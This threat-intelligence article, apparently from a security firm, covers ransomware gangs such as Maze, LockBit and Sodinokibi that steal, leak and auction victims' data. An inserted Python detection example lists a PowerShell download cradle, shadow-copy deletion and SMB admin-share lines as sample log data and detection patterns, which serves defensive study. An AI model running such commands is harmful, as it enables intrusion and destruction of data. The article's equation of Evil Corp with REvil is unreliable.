2020, a year that will be remembered for many reasons. Stories will be told to children and grandchildren of when we all had to wear face masks, stand 6 feet apart, there were no sports, and where people were not permitted to hug or shake hands. Then there was the next economic collapse and subsequent worldwide insurrection. For those who hunt cybercriminals and attempt to expose criminal and state-sponsored hacking operations and techniques, the blurring of the lines between what constitutes a ransomware attack and data breach will be the chosen horror story, starting with the Maze ransomware group.
The main goal of the Maze ‘Cha Cha’ ransomware is to encrypt every file it can reach on an infected system and then demand a ransom to recover them. The threat actor behind it took credit for locking up a very large US insurance company, and it appears Maze is continuing its attack spree with full intensity. The Maze ransomware distributors saw an opportunity they could not ignore and continue to force victim companies to pay large ransoms. Ingenious in its lack of sophistication, and devious in the extra stress it causes business leaders, Maze threatens to release stolen data if the initial ransom demanded to decrypt the encrypted files is not paid promptly. These threats continue to be a severe reality.
On New Year’s Day 2020, media reported that one of the victims of the Maze gang was suing the ransomware operators, referred to as “John Doe” in the filed legal papers, for illegally accessing the company’s network, encrypting files, and publishing data when the ransom was not paid. The company, Southwire, fell victim to a Maze attack in December 2019. Before encrypting the files the company needed to operate at an acceptable level, Maze stole 120GB of data and then encrypted 878 devices.
The company did as is often advised and did not pay the ransom, which resulted in the ransomware gang publishing a section of the stolen data to show that it would make good on its threats. The ransom amount was initially set at 850 bitcoins, approximately $6 million at the time, a staggering amount compared to the several hundred dollars demanded in the malware’s infancy. However, in an age of human-operated ransomware whose goal is to topple giant corporations, millions are now being demanded, with the amount dependent on how well-off the company is perceived to be and how anxious it may be to get back to business.
By the end of January 2020, the gang was releasing the data of multiple victims to extort payment from them. Given the extra pressure now faced by businesses, the question of whether to pay or not to pay has resurfaced and is now in a higher gear. On a lighter note, the Maze ransomware gang recently screwed up by targeting a New York, NY design and construction firm instead of the Canadian Standards Association it intended to hit. Maze appears to have confused the organization with another CSA Group (csagroup.com), a Puerto Rico-based engineering management firm that appears to have had its data stolen and encrypted. This may expose the sophistication level of the group, yet they remain a serious threat.
By not only threatening but actually releasing stolen data, what was once treated as a ransomware incident is now also a data breach. If that data contains information covered by data protection requirements such as GDPR or PCI DSS, the company may be further fined for non-compliance if the data was not properly managed. It has been argued that a ransomware attack amounts to a data breach regardless of whether data is released to the public; however, these cybersecurity debates have become purely academic in the face of current realities.
This pattern has continued with the latest development in the Maze saga, as the group seems to have teamed up with the gang behind Ragnar Locker. The partnership involves the shared use of the data-leaking platform created by those behind Maze. This would be the second group to partner with Maze, the first being LockBit. LockBit was first seen when a malicious actor used a brute-force method against a web server running an outdated virtual private network (VPN). It took the actor several days to obtain the required “Administrator” password. With the keys to the network kingdom, the nefarious individual abused Server Message Block (SMB) to perform automated network reconnaissance and then take over more company systems. In the meantime, the malicious actor had already deployed the ransomware by instructing the compromised host to run a PowerShell command that retrieved a .png file from the compromised site. This host then instructed all other hosts to which the attacker had gained access to execute the same PowerShell command, thereby automating the ransomware distribution process.
The payload of the retrieved dropper used two variants of a User Account Control (UAC) bypass to minimize the level of user interaction in its attack chain. It also loaded its modules dynamically to trick static analysis engines. This gave the threat the cover it needed to stop certain processes and delete shadow volume copies before it ultimately performed its encryption routine and dropped its ransom note.
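The intrusion chain described above (repeated VPN authentication failures, a PowerShell download of a payload disguised as a .png, SMB fan-out to administrative shares, and shadow copy deletion before encryption) can be turned into simple detection rules. The following Python is an added example written for this article, not code from Red Sky Alliance or any vendor; the log lines are constructed and the thresholds are lowered so the sample fires.

```python
import re
from collections import Counter, defaultdict

# Constructed sample events (not from the article): "<source>|<host>|<user>|<message>".
SAMPLE_EVENTS = [
    "vpn|vpn-gw|administrator|auth failure from 203.0.113.7",
    "vpn|vpn-gw|administrator|auth failure from 203.0.113.7",
    "vpn|vpn-gw|administrator|auth failure from 203.0.113.7",
    "vpn|vpn-gw|administrator|auth success from 203.0.113.7",
    "vpn|vpn-gw|jsmith|auth failure from 198.51.100.4",
    "proc|ws01|administrator|powershell.exe IEX (New-Object Net.WebClient)"
    ".DownloadString('http://example.invalid/update.png')",
    "smb|ws01|administrator|connected to \\\\ws02\\ADMIN$",
    "smb|ws01|administrator|connected to \\\\ws03\\C$",
    "smb|ws01|administrator|connected to \\\\ws04\\ADMIN$",
    "proc|ws01|administrator|vssadmin.exe delete shadows /all /quiet",
    "proc|ws02|jsmith|powershell.exe Get-ChildItem C:\\Users",
]

# PowerShell download cradle whose URL ends in an image extension (payload disguised as .png).
PS_IMAGE_DOWNLOAD = re.compile(
    r"powershell.*(DownloadString|DownloadFile|Invoke-WebRequest).*\.(png|jpg|gif|bmp)\b", re.I)
# Shadow copy deletion, the step ransomware takes before encrypting.
SHADOW_DELETE = re.compile(r"vssadmin.*delete\s+shadows|wmic.*shadowcopy\s+delete", re.I)
# Connections to administrative shares, the SMB path used to reach further hosts.
ADMIN_SHARE = re.compile(r"\\\\([\w.-]+)\\(ADMIN\$|C\$)", re.I)

def detect(events, fail_threshold=3, share_threshold=3):
    """Return (rule, host, user) alerts in event order. Thresholds are lowered
    for the sample; a production VPN rule would count per user/source over days."""
    alerts, fails, shares = [], Counter(), defaultdict(set)
    for line in events:
        source, host, user, msg = line.split("|", 3)
        if source == "vpn" and "auth failure" in msg:
            key = (user, msg.rsplit(" ", 1)[-1])  # (account, source IP)
            fails[key] += 1
            if fails[key] == fail_threshold:  # fire once per key
                alerts.append(("vpn_bruteforce", host, user))
        elif source == "proc":
            if PS_IMAGE_DOWNLOAD.search(msg):
                alerts.append(("ps_image_download", host, user))
            if SHADOW_DELETE.search(msg):
                alerts.append(("shadow_copy_delete", host, user))
        elif source == "smb":
            m = ADMIN_SHARE.search(msg)
            if m:
                shares[host].add(m.group(1).lower())  # distinct targets only
                if len(shares[host]) == share_threshold:
                    alerts.append(("smb_admin_share_fanout", host, user))
    return alerts
```

Each rule on its own is noisy in a real environment; the value is in seeing the four fire on the same account and host in sequence, which is the pattern the LockBit intrusion followed.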
The current partnership seems to be driven by the sharing of information and intelligence that can help future black hat operations become more effective at turning target networks into victim networks. As to what exactly Maze gets from the partnership, researchers see Maze as the main contributor, sharing its data-leaking platform. It is plausible that profits are shared between Maze and the associate groups in return for providing the Maze platform as a service. As more ransomware gangs struggle to successfully target big companies and organizations, cooperation between gangs is viewed as the next disturbing hacker trend that will shape the cyber threat landscape. The sharing of resources, intelligence, and ultimately victims will make ransomware more and more difficult to combat.
Soon after Maze began publishing stolen data, other groups joined the ransomware bandwagon. One of those was Sodinokibi (which Red Sky Alliance has reported on), also called Sodin and REvil by several security firms and media houses, which published data that appeared on a well-known Russian hacker forum. Prior to this Sodinokibi auction, REvil, like many other ransomware gangs, had sought to pressure victim companies into paying up by publishing a handful of sensitive files stolen from its extortion targets and then threatening to release more data unless and until the ransom demand was paid. Cyber threat experts say its recent auction is a sign that ransomware groups may be feeling the financial pinch from the current economic crisis and are looking for new ways to extract value from victims who are now less likely or able to pay a ransom demand. Approximately 337MB was dumped to show that this gang was willing to make good on a threat it had made earlier, soon after Maze began dumping data. Around the same time, the ransomware group had captured two high-level victims, Travelex and CDH Investments. Since these companies publicly stated they would not pay the ransom, it indicates a targeted and purposeful ransomware attack. In late 2019, the US Department of Justice (USDOJ) offered a $5 million bounty for information leading to the arrest and conviction of a Russian man, Maksim Viktorovich Yakubets, indicted for allegedly orchestrating a vast, international cybercrime network that called itself “Evil Corp” (REvil) and stole roughly $100 million from businesses and consumers.
Cybersecurity researchers published a follow-up report detailing the cost associated with ransomware for the first quarter of 2020, which had again risen, another 33 percent over the previous quarter. In the 4th quarter of 2019, the average ransom payment increased by 104 percent to $84,116, up from $41,198 in the 3rd quarter of 2019. While the median ransomware payment in the 4th quarter was $14,179, the doubling of the average reflects the diversity of the threat actors actively attacking companies. Some criminal groups, such as Ryuk and Sodinokibi, have moved into the large enterprise space and are focusing their attacks on large companies where they can attempt to extort the organization for a seven-figure payout. For instance, Ryuk ransom payments reached a new high of $780,000 for impacted enterprises. On the other end of the spectrum, smaller Ransomware-as-a-Service variants such as Dharma, Snatch, and Netwalker continue to target the small business space with a high number of attacks, with demands as low as $1,500. Even these lower ransom amounts can cause serious damage in the SMB market. If the Corona pandemic economic downturn did not finish off small and medium businesses, these lower-level ransomware attacks could very well close their doors for good.
In the 1st quarter of 2020, the average enterprise ransom payment increased to $111,605, up 33 percent from the 4th quarter of 2019. Ransomware distributors increasingly targeted large enterprises and were successful in forcing ransom payments for the safe recovery of data. Large enterprise ransom payments are the minority by volume, but the size of the payments dramatically pulled up the average ransom payment. The median ransom payment remained relatively stable at $44,021, up only slightly from the 4th quarter median of $42,179. The stability of the median reflects the fact that most ransom payments were modest relative to the average.
According to cyber investigators, Sodinokibi featured heavily as one of the main attackers responsible for the spike in ransomware costs. A key point discussed in their reports was the number of ransomware groups also making use of what the report describes as “data exfiltration” and what this article refers to as “data theft.” Maze was the only ransomware seen to decrease its data exfiltration attempts while others, including Sodinokibi, increased their attempts to steal data. One such attack by Sodinokibi, of international interest, was the successful data exfiltration and encryption of the US legal firm Grubman Shire Meiselas & Sacks. The firm represents John Mellencamp, Elton John, David Letterman, Robert DeNiro, Christina Aguilera, Barbra Streisand, Bruce Springsteen, and Madonna, to name a few, as well as numerous high-profile corporate entities.
The gang claims to have stolen 756GB worth of data from the law firm, and even threatened to release information discovered in the attack belonging to US President Donald Trump; however, it is unclear whether the law firm represents Trump in any of his private or public ventures. To prove that the gang did indeed have sensitive data on celebrities, it published a small amount of data pertaining to Christina Aguilera and Madonna. The announcement was made via its blog, ironically titled “Happy Blog.” Such announcements certainly applied increased pressure to the law firm’s decision-makers regarding whether to pay the ransom. The initial ransom demanded was $21 million USD, which would double if it were not paid promptly. As of the writing of this report, Happy Blog is down.
The latest development in this story involves the Sodinokibi group creating an eBay-like auction site to sell the stolen data. The group claims to have already sold the data pertaining to Trump for $1 million and was looking for buyers for the data pertaining to Madonna. This likely inspired the group to offer a bidding service to make it easier for those looking to gain information that could be used for blackmail, identity theft, or numerous other destructive cyber activities.
The auction site was added to its blog at the start of June 2020. Reports at the time stated that the group was auctioning information belonging to two companies: a US food distributor and a Canadian agricultural company. Bidding for the food distributor’s data started at $100,000, but the lot could be bought outright for $200,000. The Canadian data had a similar bid and sale structure; this time bids started at $50,000 and the lot could be bought outright for $100,000.
The auction site even had a list of rules bidders had to agree to before participating. To bid in an auction, one has to register for each auction separately. After registration, you will need to make a deposit of 10 percent of the starting price. At the end of the auction, the amount will be refunded (except for the blockchain commission). If you have not paid your bid on the winning auction, you will lose your deposit. This is to ensure that none of the bidders make fake bids. All computational operations are performed in the cryptocurrency Monero (XMR). By clicking ‘Continue,’ you confirm that you agree to the terms above. You will be given a username/password and details of the deposit payment.
With ransomware operators looking to diversify their portfolios by making money off stolen data via auctions, the threat posed to organizations has increased significantly. To date, major law firms and Fortune 500 companies have fallen victim to ransomware incidents. The attackers also have other tricks in their malware bag which help their illegal activities. Not only are Maze and Sodinokibi releasing and auctioning off stolen data; currently, Ako, Clop, DoppelPaymer, Mespinoza, Nefilim, Nemty, NetWalker, Ragnar Locker, Sekhmet, and Snatch also have adopted similar tactics.
For the victims, the question of whether to pay adds complexity. It is clear that some organizations do pay the ransom yet are still faced with the added potential cost of fines for non-compliance with cyber regulations. The pressure to pay the ransom has raised the stakes beyond tolerable levels. However, despite the pressures faced by decision-makers, the advice is still not to pay the ransom. Not only do ransoms fund criminal enterprises, but paying also opens the organization to exploitation by other ransomware and malware gangs working with the original black hat hacker.
During a recent interview, a spokesperson for the FBI summed up this view, “The FBI encourages victims to not pay a hacker’s extortion demands. The payment of extortion demands encourages continued criminal activity, leads to other victimizations, and can be used to facilitate additional serious crimes. Furthermore, paying a ransom does not guarantee the victim will regain access to their data. The best approach is to focus on defense-in-depth and have several layers of security as there is no single method to prevent compromise or exploitation.”
Security experts have not yet been able to trace the country of origin of the Maze ransomware. During their examination, McAfee Labs found some of the IP addresses belonging to the Russian Federation. However, this is not enough to confirm the origins, as IP spoofing is a common practice used by attackers to deliberately misdirect investigations and even cause disharmony between two states. In the past, Maze has been in the news for attacks against dozens of large businesses, conglomerates, government contractors, and IT service companies.
Red Sky Alliance has an expert white-hat hacker who emphasizes that there are generally two methods for big game ransomware extortion: a blog with PII leaks (automated) and direct e-mail (manual). Our analysts observed this behavior with Snatch ransomware. The group started manual, then moved to automated, and went back to manual extortion, requiring the users to reach out to a specific Protonmail (Swiss service) address with their encrypted files’ extension. Every extension was unique to that client and was generated using some system and network metadata. In our opinion, the automated platforms are more effective because, as Sodinokibi openly states, “if a company doesn't pay our demands, they can pay 10x in GDPR fines.” The manual method, if conducted correctly with a new bulletproof email address used to contact each victim, can be safer from an OPSEC standpoint and will likely be adopted by English-speaking hackers before the highly lucrative affiliate (organized crime) models we see in Russian forums.
Red Sky Alliance strongly recommends ongoing monitoring from both internal and external perspectives. Internal monitoring is common practice. However, external threats are often overlooked and can represent an early warning of impending attacks. Red Sky Alliance can provide internal monitoring in tandem with RedXray notifications on external threats, including botnet activity, public data breaches, phishing, fraud, and general targeting. Red Sky Alliance is in New Boston, NH USA. We are a Cyber Threat Analysis and Intelligence Service organization. For questions, comments or assistance, please contact the lab directly at 1-844-492-7225, or firstname.lastname@example.org